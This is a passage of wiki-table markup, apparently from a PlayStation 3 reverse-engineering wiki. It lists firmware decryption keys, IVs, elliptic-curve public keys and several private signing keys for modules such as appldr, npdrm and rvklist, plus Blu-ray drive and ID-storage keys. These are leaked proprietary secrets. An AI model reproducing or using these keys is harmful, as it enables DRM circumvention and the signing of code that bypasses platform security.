&lt;code&gt;265C04E7F20C3B8ACAC90E7C9D12757ED7ACBC01AA6624A2A927E719A4AA1222F87D917005F6072A&lt;/code&gt; || &lt;code&gt;0001608EF3BACAFFB8C3A5958A24F758325B62B08C&lt;/code&gt; || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.56 || &lt;code&gt;7FD222B3FEF467DF7E3F63AC8B77501A3B38752411E96AFEDA6587B5CD5E91B0&lt;/code&gt; || &lt;code&gt;B889290922B002F57086B818A8FDE3CC&lt;/code&gt; || &lt;code&gt;71E12CB3D81AFA79670AF4FAC4BBE41AA7F7DDF368F5615E933CB1C21A783B73C085CA49986CCF63&lt;/code&gt; || - || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.60-3.61 || &lt;code&gt;ED17248214B9AB34D57ED5CA6CCAEC9879137B4B46CE5064E6491D34001BACF2&lt;/code&gt; || &lt;code&gt;3E05572881C5BC845D310EAC28497B08&lt;/code&gt; || &lt;code&gt;504F905A8AAAA0E9BF55F6D5285697E2CABDB1A5240C4745BE8923308169EAB43E1BFD265F5E579E&lt;/code&gt; || - || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.65-3.66 || &lt;code&gt;E750FE8ED144D99782AC605944350B9F41AE489C3274C42C1BFD5AB06115C7C4&lt;/code&gt; || &lt;code&gt;0F23BBED0473B4899AD793AC76D8F722&lt;/code&gt; || &lt;code&gt;934861FF0D4BAF7141B658D1D84441D413060D7E534E99E357B5090EECFB34D947694ADB9F6E7D3F&lt;/code&gt; || - || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.70-3.74 || &lt;code&gt;4B1A459AF1D484DABD727BD316351A9A1B3404E9B1DE925B95527166DB3BB2D0&lt;/code&gt; || &lt;code&gt;3B6203C2730D283F978A12D5390DD747&lt;/code&gt; || &lt;code&gt;0AEEB187EA76913765A15A435F2F1B15545F60794FB5244DC54801B6BABD497565ED6BF57C1A80C8&lt;/code&gt; || - || &lt;code&gt;0x23&lt;/code&gt;<br /> |-<br /> | spp_verifier || 4.00-4.11 || &lt;code&gt;11FA6344E869787209E6806E66A7799F7128BD98AEAE95B386D4C88EDDDB3FEF&lt;/code&gt; || &lt;code&gt;67B49380C74FFB15AD929E8C819586AD&lt;/code&gt; || &lt;code&gt;5E028AC83D1BF838CEC43CA11969C72533A057BB0C3CB4A571F8E08DD5DF793CD1E1270CA6E89FB3&lt;/code&gt; || - || &lt;code&gt;0x04&lt;/code&gt;<br /> |-<br /> | spp_verifier || 4.20-{{latest}} || &lt;code&gt;D2961BBFFEDAEE269B061454D6ACF262CD71BC6F5320180F0A04A07583CCF7C5&lt;/code&gt; || &lt;code&gt;6D308B59BC9054B12C833359D31BAE77&lt;/code&gt; || &lt;code&gt;0CDD0D1541A6B0DFD12E951578536CA60C93853B88FCE17592DC8D134B08A94AF8BB08667E2D70A5&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===RvkLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | rvklist&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | rvklist || 030.001-3.55 || &lt;code&gt;03AF06FD1CE6DA366361682CDF59F9708B5D7876F40A9E1E9AC2B22F51B60BDF&lt;/code&gt; || &lt;code&gt;8B5D7876F40A9E1E9AC2B22F51B60BDF&lt;/code&gt; || &lt;code&gt;9ADE7830EB74245EC357CE4F6401633E5A8048FD865F9D8F1A9189535A37623E2921427463A754F7&lt;/code&gt; || &lt;code&gt;00245E673B039D656DA206BDAE4EAEFCBF2A8D5EAF&lt;/code&gt; || &lt;code&gt;0x29&lt;/code&gt;<br /> |-<br /> | rvklist || 3.56 || &lt;code&gt;22628A9EC4C414D5B32F2B4BA4926089DE9A461B190FB3E4392D057C525535DE&lt;/code&gt; || &lt;code&gt;D5D4B8ED62B6CCA0249A79776E136975&lt;/code&gt; || &lt;code&gt;51751B9F1DA58638D2D99F67E20A1D4A454C5B042CD1D0A449A2989808002BA68FB5B7F4B5B4E63B&lt;/code&gt; || - || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | rvklist || 3.60-3.61 || &lt;code&gt;BCFEDBE01D445CDEF335C543703D8E9C1199FAC33DC4595D7382EAF54EF9C4C3&lt;/code&gt; || &lt;code&gt;B20A23079516205525683D8058379CBF&lt;/code&gt; || &lt;code&gt;9859B677A5B8FCCA31A6FBA2E3220EE5E207343A58EEEE6B6CB260EB5E971352C45428E8C8398BE6&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | rvklist || 3.65-3.66 || &lt;code&gt;1EBD693BD813ADDA2203DAEE0441F4146C174F68F532B3E43A48F029230EF70C&lt;/code&gt; || &lt;code&gt;501819323BFCF9FB99396B46B70A97E7&lt;/code&gt; || &lt;code&gt;6563EA3D5694A913F24059A57B2A3645C7C8A587CF20075EFD978A048CAD7A68A8EB7E6BC4BC5448&lt;/code&gt; || - || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | rvklist || 3.70-3.74 || &lt;code&gt;4AF39F7A4E214ECB270416EDD17113A23DC5AD2EDAA5FC91817EE171CDB8B9F4&lt;/code&gt; || &lt;code&gt;0E5CB28FA2666E3ED45289DABC67DDC2&lt;/code&gt; || &lt;code&gt;758BBF611ED6BB8C32D2A49A7AD456D585D11C74926F977737EE309F213D971404A8F9022B409371&lt;/code&gt; || - || &lt;code&gt;0x31&lt;/code&gt;<br /> |-<br /> | rvklist || 4.00-4.11 || &lt;code&gt;99E8959A4363BE9EBDBC2B9C73BCBBE627BF112883E650E3F95879C0BFFB103E&lt;/code&gt; || &lt;code&gt;182CC801794A2F7027BB76D29D598550&lt;/code&gt; || &lt;code&gt;6319A4B7D99FD3A3332CB13F3DE44A898B6A4CF04B9C15E6166AFC7C5272AF7A4DE04E802FD2C71C&lt;/code&gt; || - || &lt;code&gt;0x02&lt;/code&gt;<br /> |-<br /> | rvklist || 4.20-{{latest}} || &lt;code&gt;695984b7ee2ec2f77fcc3120150dce7e4480d84480ddd8c5940aeb6f79e63d17&lt;/code&gt; || &lt;code&gt;a8ba3e4e63b2bb06fc0ce57e3bb8fc46&lt;/code&gt; || &lt;code&gt;7f1950c6e497e922400586ee338b41e01c906c5a6dfd75feb5249cfa4bec534f5ca679670a452b2a&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Spu Pkg Rvk Verifier===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | spu_pkg_rvk_verifier&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | spu_pkg_rvk_verifier || 0.80-3.55 (pkg) || &lt;code&gt;A97818BD193A67A16FE83A855E1BE9FB5640938D4DBCB2CB52C5A2F8B02B1031&lt;/code&gt; || &lt;code&gt;4ACEF01224FBEEDF8245F8FF10211E6E&lt;/code&gt; || &lt;code&gt;41DA1A8F74FF8D3F1CE20EF3E9D8865C96014FE373CA143C9BADEDF2D9D3C7573307115CCFE04F13 &lt;/code&gt; || &lt;code&gt;00542D46E7B3DAAC8AEB81E533873AABD6D74BB710 &lt;/code&gt; || &lt;code&gt;0x23&lt;/code&gt;<br /> |-<br /> | spu_pkg_rvk_verifier || 3.56-{{latest}} (spkg) || &lt;code&gt;F8F99006F1C007D5D0B1909E9566E0E70B569399FC3394A811809FDB5CAE92CD&lt;/code&gt; || &lt;code&gt;59D28DB4ADDFB40B7D768BC9667C67B1&lt;/code&gt; || &lt;code&gt;5432BDDD1F97418147AFF016EAA6100834F2CAA8C498B88965689EE44DF349B066CD43CBF4F2C5D0&lt;/code&gt; || - || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Updater (CEB units Ebootroms)=== <br /> Although these keysets are using 256 bits ERK, the algorithm used for the decryption is AES128CTR therefore only the first 16bytes of the ERK are used (ERK are truncated)<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV<br /> |-<br /> | updater || E/rXXX || &lt;code&gt;D9580C4D6349692159CDDFC33F53908B99817C618D61549DDDEA247E57788920&lt;/code&gt; || &lt;code&gt;CB445249CE6A9FEB01DF02C7B94938E1&lt;/code&gt;<br /> |-<br /> | individual_info || E/rXXX || &lt;code&gt;987C95CC38C286D0E36252B867BCEBA1D0BE92DE84F83A26DE1E670683066243&lt;/code&gt; || &lt;code&gt;1AAEBF3ED6EB1B295DAC75963DB37651&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===toolupdatedec (Communication Processor Updater binary)===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Target !! Filename !! ERK !! RIV<br /> |-<br /> | toolupdatedec || TCP510/TCP520 || reftool_cp_xxx.bin || &lt;code&gt;E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F&lt;/code&gt; || &lt;code&gt;File dependant (the first 16 bytes of the file)&lt;/code&gt;<br /> |-<br /> | toolupdatedec || DTP-T1000 || psptoolupdate.bin || &lt;code&gt;A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB&lt;/code&gt; || &lt;code&gt;File dependant (the first 16 bytes of the file)&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> === PS3 Suffix for NIDS ===<br /> &lt;pre&gt;<br /> 6759659904250490566427499489741A<br /> &lt;/pre&gt;<br /> <br /> === Bluray Drive Keys (retrieved from bluray drive firmware) ===<br /> <br /> 5BCE24712335AF70E570F6559A29F34DE7BBC42D97DE7554CE0264E41CA3171F<br /> 97EC3F4F8751F22B7FFCACA83803EAF7<br /> <br /> or<br /> <br /> E7BBC42D97DE7554CE0264E41CA3171F97EC3F4F8751F22B7FFCACA83803EAF7<br /> 5BCE24712335AF70E570F6559A29F34D<br /> <br /> * Bluray drive firmware uses same curve as KIRK 0xc 0xd 0x10 and 0x11 services.&lt;br /&gt;<br /> * Signature is at the bottom of the firmware. (0x7fd0) &lt;br /&gt;<br /> * it's highly likely to be cbc 256 aes<br /> <br /> XOR stream for descramble some encrypted areas inside bluray eeprom: http://pastebin.com/71Jx1hnE<br /> <br /> It can be used to decrypt emboot and another perdevice areas.<br /> <br /> === EID0 Section Keys ===<br /> <br /> Public key00: &lt;code&gt;94D100BE6E24991D65D93F3DA938858CEC2D133051F47DB4287AC86631719B31573EF7CCE071CA8A&lt;/code&gt;&lt;br /&gt;<br /> Curve00 sha1: &lt;code&gt;9035B33F58DFAEF389FD49187F93C4FC2D2DD268&lt;/code&gt; <br /> &lt;br&gt;Curve:<br /> &lt;pre&gt;<br /> A34D0C98B2A8DEA81E7C3FF0757C5B89<br /> 1B8523E1A34D0C98B2A8DEA81E7C3FF0<br /> 757C5B891B8523DE929F2B86E0F6525F<br /> FDC819D76D5F139A2F8A49B300A34D0C<br /> 98B2A8DEA81E7CEC7E21A8FF20DC9B8F<br /> AF755FD420216829E389548D397246E6<br /> 6DF2EC4B7C9B308B62B9CEFFA3F0071A<br /> 5C396F67FCE4A3A683<br /> &lt;/pre&gt;<br /> [https://twitter.com/naehrwert/status/286745714434899968 twitter]&lt;br /&gt;<br /> <br /> Public key06: &lt;code&gt;06485FD029853B552F7EFDD67A2DE7A1A4E25537B2459D8786426D5B27EFA5A9311CB8ABABFA0ECE&lt;/code&gt;&lt;br /&gt;<br /> Curve type06: 2 (vsh)&lt;br /&gt;<br /> <br /> Public key0A: &lt;code&gt;4F0A2BC9987640860E22EE5D86087C9692470BDF59DC4C1F2E38F92CE7B66875B59ED10C9D84FA6A&lt;/code&gt;&lt;br /&gt;<br /> Curve type0A: 2 (vsh)&lt;br /&gt;<br /> <br /> === PSP ID-Storage Keys ===<br /> '''IDPS'''&lt;br /&gt;<br /> Public key00: &lt;code&gt;4004C80BD9C8BA38221065923E324B5F0EC165ED6CFF7D9F2C420B84DFDA6E96C0AEE29927BCAF1E&lt;/code&gt;&lt;br /&gt;<br /> Curve type00: 2 (vsh)&lt;br /&gt;<br /> Public key01: &lt;code&gt;06485FD029853B552F7EFDD67A2DE7A1A4E25537B2459D8786426D5B27EFA5A9311CB8ABABFA0ECE&lt;/code&gt; &lt;-Same as EID0 Public key06&lt;br /&gt;<br /> Curve type01: 2 (vsh)&lt;br /&gt;<br /> Public key02: &lt;code&gt;3F8C34F210AEC48E1520FF2A44899E054A0DA33DF8B9754B09C0EC7E61867A5126FE6926972196F5&lt;/code&gt;&lt;br /&gt;<br /> Curve type02: 2 (vsh)&lt;br /&gt;<br /> Public key03: &lt;code&gt;CCB3440DC4836DD519E13B2805B30870DCAEE462136B3888651A98E02B29FA0CD34F1616F1ED5786&lt;/code&gt;&lt;br /&gt;<br /> Curve type03: 2 (vsh)&lt;br /&gt;<br /> Public key04: &lt;code&gt;08B336925C2B445D03A9BE51B9AABF54E4CC142EA72A23BB8060B03B71CDE0772DE82AD8931648D6&lt;/code&gt;&lt;br /&gt;<br /> Curve type04: 2 (vsh)&lt;br /&gt;&lt;br /&gt;<br /> '''UMD'''&lt;br /&gt;<br /> Public key: &lt;code&gt;4F0A2BC9987640860E22EE5D86087C9692470BDF59DC4C1F2E38F92CE7B66875B59ED10C9D84FA6A&lt;/code&gt; &lt;-Same as EID0 Public key0A&lt;br /&gt;<br /> Curve type: 2 (vsh)&lt;br /&gt;<br /> <br /> === Appldr ===<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! selftype !! version !! revision !! fw !! type !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app Internal {{SD}} || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80-0.92 || 0x00 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573 &lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80-0.92 || 0x00 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;95F50019E7A68E341FA72EFDF4D60ED376E25CF46BB48DFDD1F080259DC93F04&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;4A0955D946DB70D691A640BB7FAECC4C&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;6F8DF8EBD0A1D1DB08B30DD3A951E3F1F27E34030B42C729C55555232D61B834B8BDFFB07E54B343 &lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;006C3E4CCB2C69A5AD7C6F60448E50C7F9184EEAF4&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.92[[Talk:Keys#2.36_vs_3.30_appldr_key_79481839C4...|-2.36]]&lt;strike&gt;/3.31&lt;/strike&gt; || 0x01 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.92++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;79481839C406A632BDB4AC093D73D99AE1587F24CE7E69192C1CD0010274A8AB&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;6F0F25E1C8C4B7AE70DF968B04521DDA&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;94D1B7378BAFF5DFED269240A7A364ED68446741622E50BC6079B6E606A2F8E0A4C56E5CFF836526&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;003DE80167D2F0E9D30F2145144A558D1174F5410C&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;?-2.36&lt;/span&gt; || 0x02 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;1.00++&lt;/span&gt; || dec || &lt;code&gt;4F89BE98DDD43CAD343F5BA6B1A133B0A971566F770484AAC20B5DD1DC9FA06A&lt;/code&gt; || &lt;code&gt;90C127A9B43BA9D8E89FE6529E25206F&lt;/code&gt; || &lt;code&gt;8CA6905F46148D7D8D84D2AFCEAE61B41E6750FC22EA435DFA61FCE6F4F860EE4F54D9196CA5290E&lt;/code&gt; || &lt;code&gt;00530446451C568968EBF7068B1F45C252D70EC942&lt;/code&gt; || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;seven&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;?-2.36&lt;/span&gt; || 0x00 ? || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;0.85&amp;nbsp;&amp;lt;=3.30&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;D91166973979EA8694476B011AC62C7E9F37DA26DE1E5C2EE3D66E42B8517085&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt; &lt;code&gt;DC01280A6E46BC674B81A7E8801EBE6E&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;A0FC44108236141BF3517A662B027AFC1AC513A05690496C754DEB7D43BDC41B80FD75C212624EE4&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt; &lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x11&lt;/code&gt;&lt;!--// is not in 3.56 FIX //--&gt;<br /> |-<br /> | npdrm || ?-2.36 || 0x00 np || 1.00++ || dec || &lt;code&gt;8E737230C80E66AD0162EDDD32F1F774EE5E4E187449F19079437A508FCF9C86&lt;/code&gt; || &lt;code&gt;7AAECC60AD12AED90C348D8C11D2BED5&lt;/code&gt; || &lt;code&gt;05BF09CB6FD78050C78DE69CC316FF27C9F1ED66A45BFCE0A1E5A6749B19BD546BBB4602CF373440&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x0A&lt;/code&gt;<br /> |-<br /> | npdrm || 0.92-2.36 || 0x01 np || 1.00++ || dec || &lt;code&gt;F9EDD0301F770FABBA8863D9897F0FEA6551B09431F61312654E28F43533EA6B&lt;/code&gt; || &lt;code&gt;A551CCB4A42C37A734A2B4F9657D5540&lt;/code&gt; || &lt;code&gt;B05F9DA5F9121EE4031467E74C505C29A8E29D1022379EDFF0500B9AE480B5DAB4578A4C61C5D6BF&lt;/code&gt; || &lt;code&gt;00040AB47509BED04BD96521AD1B365B86BF620A98&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;2.40-3.30&lt;/span&gt; || 0x03 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;2.40++&lt;/span&gt; || dec || &lt;code&gt;C1E6A351FCED6A0636BFCB6801A0942DB7C28BDFC5E0A053A3F52F52FCE9754E&lt;/code&gt; || &lt;code&gt;E0908163F457576440466ACAA443AE7C&lt;/code&gt; || &lt;code&gt;50022D5D37C97905F898E78E7AA14A0B5CAAD5CE8190AE5629A10D6F0CF4173597B37A95A7545C92&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x0B&lt;/code&gt;<br /> |-<br /> | npdrm || 2.40-3.30 || 0x03 np || 2.40++ || dec || &lt;code&gt;1B715B0C3E8DC4C1A5772EBA9C5D34F7CCFE5B82025D453F3167566497239664&lt;/code&gt; || &lt;code&gt;E31E206FBB8AEA27FAB0D9A2FFB6B62F&lt;/code&gt; || &lt;code&gt;3F51E59FC74D6618D34431FA67987FA11ABBFACC7111811473CD9988FE91C43FC74605E7B8CB732D&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.40-3.42 || 0x04 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.40++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;838F5860CF97CDAD75B399CA44F4C214CDF951AC795298D71DF3C3B7E93AAEDA&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;7FDBB2E924D182BB0D69844ADC4ECA5B&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;1F140E8EF887DAB52F079A06E6915A6460B75CD256834A43FA7AF90C23067AF412EDAFE2C1778D69&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0074E922FDEE5DC4CDF22FC8D7986477F813400860&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x14&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x05 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40++&lt;/span&gt; || dec || &lt;code&gt;C109AB56593DE5BE8BA190578E7D8109346E86A11088B42C727E2B793FD64BDC&lt;/code&gt; || &lt;code&gt;15D3F191295C94B09B71EBDE088A187A&lt;/code&gt; || &lt;code&gt;B6BB0A84C649A90D97EBA55B555366F52381BB38A84C8BB71DA5A5A0949043C6DB249029A43156F7&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x06 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40++&lt;/span&gt; || dec || &lt;code&gt;6DFD7AFB470D2B2C955AB22264B1FF3C67F180983B26C01615DE9F2ECCBE7F41&lt;/code&gt; || &lt;code&gt;24BD1C19D2A8286B8ACE39E4A37801C2&lt;/code&gt; || &lt;code&gt;71F46AC33FF89DF589A100A7FB64CEAC244C9A0CBBC1FDCE80FB4BF8A0D2E66293309CB8EE8CFA95&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2C&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x05 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.40&amp;nbsp;&amp;lt;=3.42&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;B73111B0B00117E48DE5E2EE5E534C0F0EFFA4890BBB8CAD01EE0F848F91583E&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;86F56F9E5DE513894874B8BA253334B1&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;B0BA1A1AB9723BB4E87CED9637BE056066BC56E16572D43D0210A06411DBF8FEB8885CD912384AE5&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x12&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.40-3.42 || 0x04 np || 3.40++ || dec || &lt;code&gt;BB4DBF66B744A33934172D9F8379A7A5EA74CB0F559BB95D0E7AECE91702B706&lt;/code&gt; || &lt;code&gt;ADF7B207A15AC601110E61DDFC210AF6&lt;/code&gt; || &lt;code&gt;9C327471BAFF1F877AE4FE29F4501AF5AD6A2C459F8622697F583EFCA2CA30ABB5CD45D1131CAB30&lt;/code&gt; || &lt;code&gt;00B61A91DF4AB6A9F142C326BA9592B5265DA88856&lt;/code&gt; || &lt;code&gt;0x16&lt;/code&gt;<br /> |-<br /> | npdrm || 3.40-3.42 || 0x06 np || 3.40++ || dec || &lt;code&gt;8B4C52849765D2B5FA3D5628AFB17644D52B9FFEE235B4C0DB72A62867EAA020&lt;/code&gt; || &lt;code&gt;05719DF1B1D0306C03910ADDCE4AF887&lt;/code&gt; || &lt;code&gt;2A5D6C6908CA98FC4740D834C6400E6D6AD74CF0A712CF1E7DAE806E98605CC308F6A03658F2970E&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x29&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.50 || 0x07 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.50++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;945B99C0E69CAF0558C588B95FF41B232660ECB017741F3218C12F9DFDEEDE55&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;1D5EFBE7C5D34AD60F9FBC46A5977FCE&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 